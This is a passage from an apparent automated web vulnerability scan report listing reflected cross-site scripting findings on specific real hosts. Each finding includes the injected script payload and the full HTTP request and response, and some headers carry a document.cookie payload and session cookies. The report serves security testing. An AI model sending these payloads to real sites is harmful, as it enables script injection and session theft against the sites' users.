Date: Tue, 19 Apr 2011 20:08:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:56 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42982

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/grunion-contact-form/css/grunion.cssbd478\"><script>alert(1)</script>dd6edca9943?ver=3.1.1&amp;_login=3627315853">
...[SNIP]...

3.155. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/sidebar-login/style.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9cc84"><script>alert(1)</script>24036739709 was submitted in the REST URL parameter 1. This input was echoed as 9cc84\"><script>alert(1)</script>24036739709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content9cc84"><script>alert(1)</script>24036739709/plugins/sidebar-login/style.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:07:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:07:55 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602176
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42994

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content9cc84\"><script>alert(1)</script>24036739709/plugins/sidebar-login/style.css?ver=3.1.1&amp;_login=65bccf194b">
...[SNIP]...

3.156. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/sidebar-login/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ed3"><script>alert(1)</script>ff23996d7ad was submitted in the REST URL parameter 2. This input was echoed as 21ed3\"><script>alert(1)</script>ff23996d7ad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins21ed3"><script>alert(1)</script>ff23996d7ad/sidebar-login/style.css?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:29 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:25 GMT
Cache-Control: max-age=86400
X-Varnish: 1668604652
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42944

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins21ed3\"><script>alert(1)</script>ff23996d7ad/sidebar-login/style.css?ver=3.1.1&amp;_login=283d6799c0">
...[SNIP]...

3.157. http://digibond.wpengine.netdna-cdn.com/wp-content/plugins/sidebar-login/style.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/plugins/sidebar-login/style.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 41abd"><script>alert(1)</script>143b5139f95 was submitted in the REST URL parameter 4. This input was echoed as 41abd\"><script>alert(1)</script>143b5139f95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/plugins/sidebar-login/style.css41abd"><script>alert(1)</script>143b5139f95?ver=3.1.1 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:56 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42971

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/plugins/sidebar-login/style.css41abd\"><script>alert(1)</script>143b5139f95?ver=3.1.1&amp;_login=242aca52e2">
...[SNIP]...

3.158. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/images/favicon/fff-link.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23c07"><script>alert(1)</script>ac1ebf8b1b6 was submitted in the REST URL parameter 1. This input was echoed as 23c07\"><script>alert(1)</script>ac1ebf8b1b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content23c07"><script>alert(1)</script>ac1ebf8b1b6/themes/atahualpa/images/favicon/fff-link.ico HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:31 GMT
Cache-Control: max-age=86400
X-Varnish: 1668605031
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42975

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content23c07\"><script>alert(1)</script>ac1ebf8b1b6/themes/atahualpa/images/favicon/fff-link.ico/?_login=4665c5857f">
...[SNIP]...

3.159. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/images/favicon/fff-link.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3b95"><script>alert(1)</script>57b77ffa238 was submitted in the REST URL parameter 2. This input was echoed as f3b95\"><script>alert(1)</script>57b77ffa238 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themesf3b95"><script>alert(1)</script>57b77ffa238/atahualpa/images/favicon/fff-link.ico HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:09:01 GMT
Cache-Control: max-age=86400
X-Varnish: 1668607349
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43005

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/themesf3b95\"><script>alert(1)</script>57b77ffa238/atahualpa/images/favicon/fff-link.ico/?_login=cdabbcebf9">
...[SNIP]...

3.160. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.ico [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/images/favicon/fff-link.ico

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd8f9"><script>alert(1)</script>bd1c2d36605 was submitted in the REST URL parameter 6. This input was echoed as cd8f9\"><script>alert(1)</script>bd1c2d36605 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/atahualpa/images/favicon/fff-link.icocd8f9"><script>alert(1)</script>bd1c2d36605 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:09:24 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 43000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/images/favicon/fff-link.icocd8f9\"><script>alert(1)</script>bd1c2d36605/?_login=a5483e57b0">
...[SNIP]...

3.161. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/js/DD_roundies.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 646e0"><script>alert(1)</script>27728feb339 was submitted in the REST URL parameter 1. This input was echoed as 646e0\"><script>alert(1)</script>27728feb339 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content646e0"><script>alert(1)</script>27728feb339/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:01 GMT
Cache-Control: max-age=86400
X-Varnish: 1668602724
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42983

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content646e0\"><script>alert(1)</script>27728feb339/themes/atahualpa/js/DD_roundies.js?ver=0.0.2a&amp;_login=10957bbbdd">
...[SNIP]...

3.162. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/js/DD_roundies.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57026"><script>alert(1)</script>74b1e57ccc9 was submitted in the REST URL parameter 2. This input was echoed as 57026\"><script>alert(1)</script>74b1e57ccc9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes57026"><script>alert(1)</script>74b1e57ccc9/atahualpa/js/DD_roundies.js?ver=0.0.2a HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:31 GMT
Cache-Control: max-age=86400
X-Varnish: 1668605038
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 43006

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-content/themes57026\"><script>alert(1)</script>74b1e57ccc9/atahualpa/js/DD_roundies.js?ver=0.0.2a&amp;_login=9ba590e89e">
...[SNIP]...

3.163. http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-content/themes/atahualpa/js/DD_roundies.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b46e"><script>alert(1)</script>5ec3496cd24 was submitted in the REST URL parameter 5. This input was echoed as 2b46e\"><script>alert(1)</script>5ec3496cd24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-content/themes/atahualpa/js/DD_roundies.js2b46e"><script>alert(1)</script>5ec3496cd24?ver=0.0.2a HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:09:05 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:09:01 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 43040

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.netdna-cdn.com/wp-content/themes/atahualpa/js/DD_roundies.js2b46e\"><script>alert(1)</script>5ec3496cd24?ver=0.0.2a&amp;_login=5410b6ce8a">
...[SNIP]...

3.164. http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-includes/js/l10n.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 398c9"><script>alert(1)</script>4e487c44e11 was submitted in the REST URL parameter 1. This input was echoed as 398c9\"><script>alert(1)</script>4e487c44e11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes398c9"><script>alert(1)</script>4e487c44e11/js/l10n.js?ver=20101110 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:07:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:07:49 GMT
Cache-Control: max-age=86400
X-Varnish: 1668601693
Age: 0
Via: 1.1 varnish
X-Cache: MISS
Content-Length: 42893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://www.digitalbond.com/wp-includes398c9\"><script>alert(1)</script>4e487c44e11/js/l10n.js?ver=20101110&amp;_login=7b94eab575">
...[SNIP]...

3.165. http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digibond.wpengine.netdna-cdn.com
Path:   /wp-includes/js/l10n.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e502"><script>alert(1)</script>87deeb2ec4f was submitted in the REST URL parameter 3. This input was echoed as 5e502\"><script>alert(1)</script>87deeb2ec4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/l10n.js5e502"><script>alert(1)</script>87deeb2ec4f?ver=20101110 HTTP/1.1
Host: digibond.wpengine.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://www.digitalbond.com/2008/07/20/managing-your-security-career5f595%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E67a759c718b/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: nginx/0.8.36
Date: Tue, 19 Apr 2011 20:08:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
X-Pingback: http://www.digitalbond.com/xmlrpc.php
X-Powered-By: W3 Total Cache/0.9.1.3
Last-Modified: Tue, 19 Apr 2011 20:08:21 GMT
Vary: User-Agent,Accept-Encoding
Content-Length: 42947

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head>
<
...[SNIP]...
<form method="post" action="http://digibond.wpengine.netdna-cdn.com/wp-includes/js/l10n.js5e502\"><script>alert(1)</script>87deeb2ec4f?ver=20101110&amp;_login=ba7f702b91">
...[SNIP]...

3.166. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbd65"><script>alert(1)</script>dfef0ede538 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DMdbd65"><script>alert(1)</script>dfef0ede538/2010DM/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:33 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 333
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DMdbd65"><script>alert(1)</script>dfef0ede538/2010DM/467996617/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><I
...[SNIP]...

3.167. http://dm.de.mookie1.com/2/B3DM/2010DM/12086108130@x23 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dm.de.mookie1.com
Path:   /2/B3DM/2010DM/12086108130@x23

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48cc0"><script>alert(1)</script>b9e470def13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/B3DM/2010DM48cc0"><script>alert(1)</script>b9e470def13/12086108130@x23?USNetwork/Dominos_11Q2_247_CPC_728 HTTP/1.1
Host: dm.de.mookie1.com
Proxy-Connection: keep-alive
Referer: http://b3.mookie1.com/2/247B3/Dominos/11Q2/CPC/728/1849951236@x90
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660; dlx_20100929=set; other_20110126=set; id=914804995789526; session=1303242610|1303242619

Response

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 20:06:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 334
Content-Type: text/html

<A HREF="http://dm.de.mookie1.com/RealMedia/ads/click_lx.ads/B3DM/2010DM48cc0"><script>alert(1)</script>b9e470def13/1058946340/x23/default/empty.gif/726348573830327254356f4142562f46?x" target="_top"><
